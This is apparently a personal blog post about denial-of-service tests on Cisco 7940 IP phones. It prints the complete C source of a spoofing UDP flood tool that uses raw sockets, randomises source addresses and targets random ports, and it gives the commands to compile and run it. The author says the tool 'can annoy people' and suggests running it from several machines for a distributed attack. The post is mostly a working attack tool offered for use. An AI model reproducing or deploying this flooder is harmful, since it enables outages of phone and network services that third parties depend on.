Yesterday we where still working on some attacks on our bench test and we tried some exploits on IP phones
that we found on the internet. Most of them where making DOS or DDOS on the phones,
this means that the phones were basically freezing. Then we made some modification to a C UDP flooder code that I had from a few years.
The code is basically sending UDP on random ports to a specific address with a random source … and only working on linux.
the code helped us to stop the connection between the 2 phones.
The code sends UDP packets to a phone wich tries to answer by pings and become unavailable for all the other network devices. Since the UDP packets are crafted with random addresses (or predefined addresses … the phone replies with pings to these addresses and thus not to your computer)
We also discovered that when the connection between the 2 phones is established the IP phone were not affected.
The code can be found below or on my github repo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 |
#include <stdio.h> // printf/fprintf #include <stdlib.h> #include <string.h> #include <netinet/ip.h> // struct ip #include <sys/socket.h> // socket() #include <netinet/in.h> // struct sockadd #define __FAVOR_BSD #define _USE_BSD #include <netinet/udp.h> // struct udp #define PADDING_SIZE 1 #define N_LOOP 10 #define U_WAITING 100000 void udp(char *); unsigned short int in_chksum (unsigned short int *, int); unsigned long hasard(unsigned long, unsigned long); main() { srand(time(NULL)); int i; for(i=0;i<N_LOOP;i++) { udp("xxx.xxx.xxx.xxx"); usleep(U_WAITING); printf("-"); udp("xxx.xxx.xxx.xxx"); usleep(U_WAITING); printf("+"); } } void udp(char *cible) { int sd; sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sd == -1) { fprintf(stderr,"socket() error, root ?\n"); } unsigned long ip_src = hasard(4294967295/2,4294967295); unsigned long ip_dst = inet_addr(cible); unsigned short p_src = (unsigned short) hasard(0,65535); unsigned short p_dst = (unsigned short) hasard(0,65535); struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = p_dst; sin.sin_addr.s_addr = ip_dst; // dst struct ip *ip; struct udphdr *udp; char *dgm, *data; int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE; dgm = (char *) malloc(pksize); ip = (struct ip *) dgm; udp = (struct udphdr *) (dgm + sizeof(struct ip)); data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr)); memset(dgm, 0, pksize); memcpy((char *) data, "G", PADDING_SIZE); int un = 1; if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1) { fprintf(stderr,"setsockopt()"); exit(-1); } //entete ip ip->ip_v = 4; ip->ip_hl = 5; ip->ip_tos = 0; ip->ip_len = sizeof(pksize); ip->ip_ttl = 255; ip->ip_off = 0; ip->ip_id = sizeof( 45 ); ip->ip_p = IPPROTO_UDP; ip->ip_sum = 0; // a remplir aprés ip->ip_src.s_addr = ip_src; ip->ip_dst.s_addr = ip_dst; //entete udp udp->uh_sport = p_src; udp->uh_dport = p_dst; udp->uh_ulen = htons(sizeof(struct udphdr ) + PADDING_SIZE); udp->uh_sum = 0; // envoi if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr)) == -1) { fprintf(stderr,"oops, sendto() error\n"); } //libere la memoire free(dgm); close(sd); } u_short in_chksum (u_short *addr, int len) // taken from papasmurf.c { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } unsigned long hasard(unsigned long min, unsigned long max){ return (u_long) (min + ((float) rand() / RAND_MAX * (max - min + 1))); } |
The code is working well, and can annoy people without damaging the phone.
you can easily compile it with the following command :
1 |
gcc -o udp udp.c |
and run it with
1 |
./udp |
if everything is working you should see
1 |
+-+-+- |
this is appearing during the run time.
we tested it on 7940 phones from cisco and it was working pretty well.
Btw : this code can run against multiple network equipments, it was not dedicated to IP phones so I guess some kind of DOS or DDOS would be possible by running it on multiple machines.
Have fun.
Post a Comment